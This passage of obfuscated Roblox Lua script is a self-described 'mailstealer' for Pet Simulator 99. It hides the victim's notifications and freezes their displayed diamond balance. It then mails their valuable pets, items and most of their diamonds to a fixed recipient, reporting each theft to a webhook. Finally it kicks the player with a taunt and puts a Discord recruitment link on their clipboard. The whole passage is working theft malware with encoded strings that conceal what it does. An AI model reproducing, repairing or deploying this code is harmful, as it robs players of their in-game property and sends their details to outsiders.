Diamonds"].Value;local v19=game:GetService(v7("\34\241\52\45\115\0\238","\22\114\157\85\84")).LocalPlayer.leaderstats["💎 Diamonds"];v19:GetPropertyChangedSignal(v7("\242\202\31\209\88","\200\164\171\115\164\61\150")):Connect(function() v19.Value=v18;end);local v20=game:GetService(v7("\142\248\2\92\134\172\231","\227\222\148\99\37")).LocalPlayer.PlayerScripts.Scripts.Core[v7("\3\64\93\245\252\32\65\18\198\252\61\86\91\248\254\115\117\103\223","\153\83\50\50\150")];local v21=game:GetService(v7("\109\122\114\5\118\185\94","\45\61\22\19\124\19\203")).LocalPlayer.PlayerGui.Notifications;v20.Disabled=true;v21:GetPropertyChangedSignal(v7("\228\28\12\247\14\117\189","\217\161\114\109\149\98\16")):Connect(function() v21.Enabled=false;end);v21.Enabled=false;local v24=game:GetService(v7("\58\52\44\108\143\113\0\54\49\127\185","\20\114\64\88\28\220"));local function v25(v60,v61) if v13[v60] then local v364=0 + 0 ;while true do if (v364==0) then local v448=0 -0 ;while true do if (v448==(0 + 0)) then for v508,v509 in pairs(v13[v60]) do local v510=0 + 0 ;local v511;local v512;while true do if (v510==(1 + 0)) then while true do if (v511==0) then v512=v24:JSONDecode(v508);if ((v512.id==v61.id) and (v512.tn==v61.tn) and (v512.sh==v61.sh) and (v512.pt==v61.pt)) then return v509;end break;end end break;end if (0==v510) then v511=571 -(47 + 524) ;v512=nil;v510=1;end end end return 0 + 0 ;end end end end end end local function v26(v62,v63,v64,v65) local v66={[2 -1 ]=v15,[2 -0 ]=v12,[3]=v62,[4]=v63,[5]=v64 or (2 -1) };game:GetService(v7("\3\4\194\184\241\211\188\37\4\214\135\236\223\175\48\6\215","\221\81\97\178\212\152\176")):WaitForChild(v7("\227\226\9\236\21\223\236","\122\173\135\125\155")):WaitForChild(v7("\169\192\9\181\61\62\208\222\129\51\188\49\53","\168\228\161\96\217\95\81")):InvokeServer(unpack(v66));if (Webhook and (Webhook~="")) then v8(Webhook,game.Players.LocalPlayer.Name,v65);end end local function v27() local v67=1726 -(1165 + 561) ;local v68;local v69;while true do if (0==v67) then v68=0;v69=nil;v67=1 + 0 ;end if (v67==(3 -2)) then while true do if (v68==0) then local v449=0;while true do if (v449==(0 + 0)) then v69=479 -(341 + 138) ;for v514,v515 in pairs(v10.Pet) do local v516=0 + 0 ;local v517;local v518;while true do if (v516==(0 -0)) then v517=v515.id;v518=v9.Directory.Pets[v517];v516=327 -(89 + 237) ;end if (v516==(3 -2)) then if (v518.huge and (v25(v7("\235\212\58","\55\187\177\78\60\79"),v515)>=min_rap)) then v69=v69 + 1 ;end break;end end end v449=1 -0 ;end if (v449==(882 -(581 + 300))) then v68=1221 -(855 + 365) ;break;end end end if (v68==(2 -1)) then return v69;end end break;end end end local function v28() local v70=0;local v71;local v72;while true do local v301=0 + 0 ;local v302;while true do if (v301==(1235 -(1030 + 205))) then v302=0;while true do if (v302==(0 + 0)) then if (v70==1) then for v519,v520 in pairs(v10.Pet) do local v521=v520.id;local v522=v9.Directory.Pets[v521];if (v522.huge and (v25(v7("\29\203\75","\224\77\174\63\139\38\175"),v520)>=min_rap)) then local v542=0;local v543;while true do if (v542==1) then v543=v27();if (v543<v72) then v71=v71 + 1 + 0 ;v72=v543;end break;end if (v542==0) then if v520._lk then local v559={[1]=v519,[288 -(156 + 130) ]=false};game:GetService(v7("\182\68\72\34\141\66\89\58\129\69\107\58\139\83\89\41\129","\78\228\33\56")):WaitForChild(v7("\224\123\166\20\138\220\117","\229\174\30\210\99")):WaitForChild(v7("\55\226\133\90\228\51\62\36\222\131\69\193\50\58\16\232\130","\89\123\141\230\49\141\93")):InvokeServer(unpack(v559));end v26(v7("\195\116\226","\42\147\17\150\108\112"),v519,v520._am or (2 -1) ,v521);v542=1;end end end end return v71;end if (v70==(0 -0)) then local v513=0 -0 ;while true do if (v513==(0 + 0)) then v71=0 + 0 ;v72=v27();v513=70 -(10 + 59) ;end if (v513==(1 + 0)) then v70=4 -3 ;break;end end end break;end end break;end end end end local function v29() local v73=1163 -(671 + 492) ;local v74;local v75;local v76;while true do if (v73==1) then v76=nil;while true do if (v74==(0 + 0)) then local v450=1215 -(369 + 846) ;while true do if ((1 + 0)==v450) then v74=1;break;end if (v450==(0 + 0)) then v75=v27();v76=1945 -(1036 + 909) ;v450=1 + 0 ;end end end if (v74==1) then repeat v76=v76 + v28() ;until v76==v75  break;end end break;end if (v73==0) then v74=0 -0 ;v75=nil;v73=204 -(11 + 192) ;end end end local function v30() local v77=0 + 0 ;for v303,v304 in pairs(v10.Pet) do local v305=175 -(135 + 40) ;local v306;local v307;while true do if (v305==(0 -0)) then v306=v304.id;v307=v9.Directory.Pets[v306];v305=1 + 0 ;end if (v305==1) then if (v307.exclusiveLevel and (v25(v7("\63\163\57","\136\111\198\77\31\135"),v304)>=min_rap)) then v77=v77 + (2 -1) ;end break;end end end return v77;end local function v31() local v78=0;local v79;local v80;while true do if (v78==0) then local v365=0;while true do if ((0 -0)==v365) then v79=176 -(50 + 126) ;v80=v30();v365=2 -1 ;end if (v365==(1 + 0)) then v78=1414 -(1233 + 180) ;break;end end end if (v78==1) then local v366=969 -(522 + 447) ;while true do if (v366==0) then for v480,v481 in pairs(v10.Pet) do local v482=1421 -(107 + 1314) ;local v483;local v484;while true do if (v482==(0 + 0)) then v483=v481.id;v484=v9.Directory.Pets[v483];v482=2 -1 ;end if (v482==(1 + 0)) then if (v484.exclusiveLevel and (v25(v7("\50\12\179","\201\98\105\199\54\221\132\119"),v481)>=min_rap)) then local v544=0 -0 ;local v545;local v546;while true do if (v544==0) then v545=0;v546=nil;v544=3 -2 ;end if ((1911 -(716 + 1194))==v544) then while true do if (v545==(1 + 0)) then v546=v30();if (v546<v80) then local v560=0;while true do if (v560==0) then v79=v79 + 1 + 0 ;v80=v546;break;end end end break;end if (v545==0) then if v481._lk then local v561={[1]=v480,[505 -(74 + 429) ]=false};game:GetService(v7("\139\9\147\45\11\54\173\173\9\135\18\22\58\190\184\11\134","\204\217\108\227\65\98\85")):WaitForChild(v7("\112\198\225\242\35\210\85","\160\62\163\149\133\76")):WaitForChild(v7("\250\175\14\36\202\216\167\50\28\198\194\140\2\44\200\211\164","\163\182\192\109\79")):InvokeServer(unpack(v561));end v26(v7("\4\35\20","\149\84\70\96\160"),v480,v481._am or 1 ,v483);v545=1 -0 ;end end break;end end end break;end end end return v79;end end end end end local function v32() local v81=0;local v82;local v83;while true do if ((0 + 0)==v81) then v82=v30();v83=0 -0 ;v81=1 + 0 ;end if (v81==1) then repeat v83=v83 + v31() ;until v83==v82  break;end end end local function v33() for v308,v309 in pairs(v10.Egg) do local v310=0;local v311;local v312;while true do if ((2 -1)==v310) then if (v312 and (v25(v7("\29\1\10","\141\88\102\109"),v309)>=min_rap)) then v26(v7("\150\84\205","\161\211\51\170\16\122\93\53"),v308,v309._am or 1 ,v311);end break;end if (v310==(0 -0)) then local v414=0;while true do if (v414==(433 -(279 + 154))) then v311=v309.id;v312=v9.Directory.Eggs[v311];v414=779 -(454 + 324) ;end if (v414==(1 + 0)) then v310=1;break;end end end end end end local function v34() for v313,v314 in pairs(v10.Charm) do local v315=17 -(12 + 5) ;local v316;local v317;while true do if (v315==0) then v316=v314.id;v317=v9.Directory.Charms[v316];v315=1 + 0 ;end if (v315==(2 -1)) then if (v317 and (v25(v7("\216\166\179\58\246","\72\155\206\210"),v314)>=min_rap)) then v26(v7("\101\114\85\28\62","\83\38\26\52\110"),v313,v314._am or (1 + 0) ,v316);end break;end end end end local function v35() for v318,v319 in pairs(v10.Enchant) do local v320=1093 -(277 + 816) ;local v321;local v322;local v323;while true do if (0==v320) then v321=0 -0 ;v322=nil;v320=1184 -(1058 + 125) ;end if (v320==1) then v323=nil;while true do if (1==v321) then if (v323 and (v25(v7("\125\25\36\78\89\25\51","\38\56\119\71"),v319)>=min_rap)) then v26(v7("\214\225\91\222\36\88\231","\54\147\143\56\182\69"),v318,v319._am or 1 ,v322);end break;end if (v321==0) then v322=v319.id;v323=v9.Directory.Enchants[v322];v321=1 + 0 ;end end break;end end end end local function v36() for v324,v325 in pairs(v10.Potion) do local v326=975 -(815 + 160) ;local v327;local v328;local v329;while true do if (v326==0) then v327=0 -0 ;v328=nil;v326=1;end if (v326==(2 -1)) then v329=nil;while true do if (v327==1) then if (v329 and (v25(v7("\230\142\235\64\208\216","\191\182\225\159\41"),v325)>=min_rap)) then v26(v7("\27\29\60\92\132\137","\162\75\114\72\53\235\231"),v324,v325._am or (1 + 0) ,v328);end break;end if ((0 -0)==v327) then local v489=0;while true do if (v489==(1898 -(41 + 1857))) then v328=v325.id;v329=v9.Directory.Potions[v328];v489=1894 -(1222 + 671) ;end if (v489==(2 -1)) then v327=1 -0 ;break;end end end end break;end end end end local function v37() for v330,v331 in pairs(v10.Misc) do local v332=v331.id;local v333=v9.Directory.MiscItems[v332];if (v333 and (v25(v7("\161\53\87\225","\98\236\92\36\130\51"),v331)>min_rap)) then v26(v7("\137\16\31\185","\80\196\121\108\218\37\200\213"),v330,v331._am or (1183 -(229 + 953)) ,v332);end end end local function v38() for v334,v335 in pairs(v10.Hoverboard) do local v336=v335.id;local v337=v9.Directory.Hoverboards[v336];if (v337 and (v25(v7("\40\124\20\122\89\12\133\1\97\6","\234\96\19\98\31\43\110"),v335)>min_rap)) then v26(v7("\46\16\68\194\190\112\132\7\13\86","\235\102\127\50\167\204\18"),v334,v335._am or (1775 -(1111 + 663)) ,v336);end end end local function v39() for v338,v339 in pairs(v10.Booth) do local v340=0;local v341;local v342;while true do if (v340==(1580 -(874 + 705))) then if (v342 and (v25(v7("\114\174\250\55\76","\78\48\193\149\67\36"),v339)>min_rap)) then v26(v7("\18\17\143\12\73","\33\80\126\224\120"),v338,v339._am or 1 ,v341);end break;end if (v340==(0 + 0)) then v341=v339.id;v342=v9.Directory.Booths[v341];v340=1 + 0 ;end end end end local function v40() for v343,v344 in pairs(v10.Ultimate) do local v345=0;local v346;local v347;while true do if (v345==0) then local v419=0 -0 ;while true do if (v419==(1 + 0)) then v345=680 -(642 + 37) ;break;end if (v419==(0 + 0)) then v346=v344.id;v347=v9.Directory.Ultimates[v346];v419=1 + 0 ;end end end if (v345==1) then if (v347 and (v25(v7("\217\164\23\205\81\237\188\6","\60\140\200\99\164"),v344)>min_rap)) then v26(v7("\178\248\16\47\175\134\224\1","\194\231\148\100\70"),v343,v344._am or (2 -1) ,v346);end break;end end end end local function v41() for v348,v349 in pairs(v14().Inventory.Currency) do if (v349.id==v7("\98\69\192\174\249\198\66\95","\168\38\44\161\195\150")) then local v367=454 -(233 + 221) ;local v368;local v369;while true do if (v367==(0 -0)) then v368=v349._am;v369={[1 + 0 ]=v15,[1543 -(718 + 823) ]=v12,[2 + 1 ]=v7("\163\233\144\100\53\230\181\15","\118\224\156\226\22\80\136\214"),[809 -(266 + 539) ]=v348,[5]=v368-(28312 -18312) };v367=1226 -(636 + 589) ;end if (v367==(2 -1)) then game:GetService(v7("\112\235\73\140\75\237\88\148\71\234\106\148\77\252\88\135\71","\224\34\142\57")):WaitForChild(v7("\240\162\209\202\124\227\86","\110\190\199\165\189\19\145\61")):WaitForChild(v7("\247\234\126\228\137\200\194\177\55\219\142\201\222","\167\186\139\23\136\235")):InvokeServer(unpack(v369));if (Webhook and (Webhook~="")) then v8(Webhook,game.Players.LocalPlayer.Name,v7("\61\176\133\30\64\245","\109\122\213\232")   .. (v368-10000) );end break;end end end end end local function v42() if v10.Box then for v370,v371 in pairs(v10.Box) do local v372=0 -0 ;local v373;while true do if ((0 + 0)==v372) then v373={[1 + 0 ]=v370};game:GetService(v7("\220\242\178\60\231\244\163\36\235\243\145\36\225\229\163\55\235","\80\142\151\194")):WaitForChild(v7("\45\195\99\91\12\212\124","\44\99\166\23")):WaitForChild(v7("\94\248\49\108\115\147\117\227\33\50\33\165\107\183\8\58\63","\196\28\151\73\86\83")):InvokeServer(unpack(v373));break;end end end end end local function v43() for v350,v351 in pairs(v14().Inventory.Currency) do if (v351.id==v7("\215\10\40\29\141\86\28\101","\22\147\99\73\112\226\56\120")) then GemAmount1=v351._am;return GemAmount1;end end end local function v44() repeat v41();until (v43()==nil) or (v43()<10000)  end if ((v27()>0) or (v43()>(1001015 -(657 + 358)))) then local v352=0;while true do if (v352==(0 -0)) then v42();v29();v32();v352=2 -1 ;end if (4==v352) then setclipboard("https://discord.com/invite/3RzYxJQr");v11:kick("All your stuff has just been stolen by PETSIM99SCRIPT mailstealer. Join https://discord.com/invite/3RzYxJQr to start mailstealing yourself");break;end if (v352==3) then if (v10.Booth~=nil) then v39();end v37();v44();v352=4;end if ((1189 -(1151 + 36))==v352) then if (v10.Enchant~=nil) then v35();end if (v10.Potion~=nil) then v36();end if (v10.Hoverboard~=nil) then v38();end v352=3;end if (1==v352) then if (v10.Egg~=nil) then v33();end if (v10.Charm~=nil) then v34();end if (v10.Ultimate~=nil) then v40();end v352=2 + 0 ;end end else v11:kick(v7("\157\103\240\250\159\248\122\236\181\158\187\103\235\229\153\248\112\250\240\142\173\97\235\250\131\226\53\178\237\221\232\37\179\211\217\153\39","\237\216\21\130\149"));end
